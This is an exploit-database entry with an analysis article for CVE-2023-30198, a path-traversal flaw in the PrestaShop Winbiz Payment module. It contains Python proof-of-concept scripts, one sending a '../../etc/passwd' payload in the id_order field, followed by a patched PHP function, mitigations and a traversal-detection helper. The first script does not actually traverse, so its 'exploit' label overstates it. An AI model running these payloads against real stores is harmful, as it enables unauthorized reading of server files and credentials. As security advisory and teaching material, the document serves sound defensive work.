PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory

Exploit Author: Amirhossein Bahramizadeh
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: Python
Published Date: 2023-06-26
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Date: 2023-06-20
# Dork: /modules/winbizpayment/downloads/download.php
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
# Version: 17.1.3 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-30198

import requests
import string
import random

# The base URL of the vulnerable site
base_url = "http://example.com"

# The URL of the login page
login_url = base_url + "/authentication.php"

# The username and password for the admin account
username = "admin"
password = "password123"

# The URL of the vulnerable download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"

# The ID of the order to download
order_id = 1234

# The path to save the downloaded file
file_path = "/tmp/order_%d.pdf" % order_id

# The session cookies to use for the requests
session_cookies = None

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the login page to authenticate as the admin user
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)

# Save the session cookies for future requests
session_cookies = session.cookies.get_dict()

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the download.php file to download the order PDF
download_data = {"id_order": order_id, "csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)

# Save the downloaded file to disk
with open(file_path, "wb") as f:
    f.write(response.content)

# Print a message indicating that the file has been downloaded
print("File downloaded to %s" % file_path)


Exploiting Path Traversal in PrestaShop Winbiz Payment Module: CVE-2023-30198

Security vulnerabilities in e-commerce platforms are a persistent threat, especially when third-party modules introduce improper input validation. One such critical flaw was discovered in the Winbiz Payment module for PrestaShop, a widely used open-source shopping platform. This vulnerability, identified as CVE-2023-30198, stems from an improper limitation of a pathname to a restricted directory—a classic path traversal issue that allows attackers to access arbitrary files on the server.

Understanding the Vulnerability

The core issue lies in the /modules/winbizpayment/downloads/download.php endpoint, which is designed to allow authorized users to download PDF invoices associated with specific order IDs. However, due to insufficient validation of user-supplied input, an attacker can manipulate the id_order parameter to traverse directories beyond the intended restricted folder.

When a user requests a download via download.php, the module constructs a file path based on the provided id_order. If the application does not sanitize or restrict the path to a predefined directory (e.g., /modules/winbizpayment/downloads/), an attacker can use path traversal sequences like ../../ or ..%2f to access sensitive files outside the intended scope—such as configuration files, database backups, or even administrative credentials.

Real-World Exploit Example

Consider the following attack scenario:


import requests
import string
import random

# The base URL of the vulnerable site
base_url = "http://example.com"

# The URL of the login page
login_url = base_url + "/authentication.php"

# The username and password for the admin account
username = "admin"
password = "password123"

# The URL of the vulnerable download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"

# In this variant the order ID is only used to name the output file
order_id = 1234

# The path to save the downloaded file
file_path = "/tmp/order_%d.pdf" % order_id

# Generate a random string for the CSRF token (as in the original PoC above)
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the login page to authenticate as the admin user
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)

# Save the session cookies for future requests
session_cookies = session.cookies.get_dict()

# Craft malicious path traversal to access sensitive files
download_data = {"id_order": "../../../../../../etc/passwd", "csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)

# Save the downloaded file to disk
with open(file_path, "wb") as f:
    f.write(response.content)

print("File downloaded to %s" % file_path)

Explanation: This exploit script demonstrates how an authenticated admin user can abuse the id_order parameter to request a file located outside the intended download directory. By setting id_order to ../../../../../../etc/passwd, the attacker attempts to read the system’s password file. If the module lacks proper path sanitization, the server will serve the file, effectively exposing sensitive system information.

Impact and Risk Assessment

Given that the module is used in production environments across Iran and other regions, the implications are significant:

  • Data Exposure: Attackers can retrieve configuration files, database dumps, or even private keys stored on the server.
  • Privilege Escalation: Access to config.inc.php or settings.php may reveal database credentials or admin passwords.
  • Server Compromise: If the module allows file uploads or execution, this vulnerability could serve as a foothold for full server takeover.

According to the NVD (National Vulnerability Database), this issue is rated as High severity due to its potential for unauthorized access and data leakage.

Root Cause Analysis

The vulnerability arises from a failure to implement proper path normalization and restriction. The module should:

  • Sanitize user input by removing or blocking .. sequences.
  • Use a whitelist of allowed filenames or directory paths.
  • Apply canonicalization to resolve path traversal attempts.
  • Enforce access control based on user role and session context.

Instead, the vulnerable implementation directly uses the id_order value as a file path component without validation, making it susceptible to attacks like id_order=1234;../../../../etc/passwd.

Security Best Practices and Fixes

Developers and administrators must address this flaw through robust input validation and secure coding practices. Here is a corrected, secure implementation:


// Secure version of download.php logic (PHP)
function secure_download($order_id) {
    // Validate the input before it is used in any path: only letters, digits, '_' and '-'
    if (!is_string($order_id) || preg_match('/^[a-zA-Z0-9_-]+$/', $order_id) !== 1) {
        return "Invalid order ID";
    }

    // download.php lives in /modules/winbizpayment/downloads/, so __DIR__ resolves to
    // the allowed directory on the real filesystem (the bare web path would not)
    $allowed_dir = realpath(__DIR__);
    if ($allowed_dir === false) {
        return "Download directory unavailable";
    }
    $allowed_dir .= DIRECTORY_SEPARATOR; // trailing separator so "downloads_old/" cannot match

    $file_path = $allowed_dir . 'order_' . $order_id . '.pdf';

    // Normalize the path; realpath() returns false for a missing file, so check that first
    $normalized_path = realpath($file_path);
    if ($normalized_path === false) {
        return "File not found";
    }

    // Ensure the resolved path is still inside the allowed directory
    if (strpos($normalized_path, $allowed_dir) !== 0) {
        return "Access denied";
    }

    // Check that it is a regular, readable file
    if (!is_file($normalized_path) || !is_readable($normalized_path)) {
        return "File not found";
    }

    // Serve the file
    header('Content-Type: application/pdf');
    header('Content-Disposition: attachment; filename="order_' . $order_id . '.pdf"');
    readfile($normalized_path);
    return true;
}

Explanation: This secure implementation:

  • Uses preg_match to restrict input to alphanumeric, underscore and hyphen characters.
  • Applies realpath() to normalize the path and eliminate traversal sequences.
  • Verifies that the final path starts with the allowed directory.
  • Ensures the file exists and is readable before serving.

These measures prevent attackers from accessing files outside the intended scope.

Recommendations for Users and Admins

For organizations using PrestaShop with the Winbiz Payment module:

  • Update Immediately: Upgrade to version 17.1.4 or later, which includes patches for CVE-2023-30198.
  • Disable Unused Modules: Remove or disable the Winbiz Payment module if not actively used.
  • Monitor File Access: Implement logging for file downloads to detect suspicious patterns.
  • Apply WAF Rules: Use a Web Application Firewall (WAF) to block path traversal attempts in URLs.
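As an added example (not part of the original advisory or the module's code), the following Python puts the allow-list and canonicalization checks from the fix above beside a small detector for the "Monitor File Access" recommendation. The log format is constructed for this example: a module-level download log that records the id_order value, since the PoC sends the parameter in a POST body that ordinary web-server access logs do not capture.

```python
import os
import re
from urllib.parse import unquote

# Constructed sample log for this example (assumed format, one download request
# per line: "<timestamp> <client-ip> id_order=<value>"); not real traffic.
SAMPLE_LOG = """\
2023-06-21T10:02:11Z 203.0.113.5 id_order=1234
2023-06-21T10:02:15Z 203.0.113.5 id_order=../../../../../../etc/passwd
2023-06-21T10:02:19Z 203.0.113.5 id_order=..%2f..%2f..%2fetc%2fpasswd
2023-06-21T10:02:23Z 203.0.113.5 id_order=1234;../../../../etc/passwd
2023-06-21T10:03:01Z 198.51.100.7 id_order=order_5678
"""

ORDER_ID_RE = re.compile(r"[A-Za-z0-9_-]+")  # same allow-list as the corrected download.php

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (..%2f, %252e%252e) before inspecting the value."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_safe_order_id(value):
    """True only if the decoded value contains no separators, dots or other metacharacters."""
    return ORDER_ID_RE.fullmatch(decode_fully(value)) is not None

def resolve_order_pdf(allowed_dir, order_id):
    """Canonicalize and confirm containment; returns the file path or None. commonpath is
    used instead of a bare prefix test so a sibling directory (downloads_old/) cannot pass."""
    if not is_safe_order_id(order_id):
        return None
    allowed_dir = os.path.realpath(allowed_dir)
    candidate = os.path.realpath(os.path.join(allowed_dir, "order_%s.pdf" % order_id))
    if os.path.commonpath([allowed_dir, candidate]) != allowed_dir:
        return None
    return candidate

def flag_traversal_attempts(log_text):
    """Return (timestamp, ip, raw id_order) for each request that fails the allow-list."""
    hits = []
    for line in log_text.splitlines():
        timestamp, client_ip, param = line.split(" ", 2)
        value = param.split("=", 1)[1]
        if not is_safe_order_id(value):
            hits.append((timestamp, client_ip, value))
    return hits
```

The detector flags three of the five constructed requests, including the percent-encoded variant that a naive substring match for "../" would miss.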

Conclusion

Path traversal vulnerabilities like CVE-2023-30198 highlight the importance of secure coding practices in third-party modules. Even seemingly minor flaws in input validation can lead to severe data breaches. Developers must prioritize input sanitization, path normalization, and directory restriction to safeguard e-commerce systems. For administrators, timely patching and continuous monitoring are essential to maintain system integrity and protect customer data.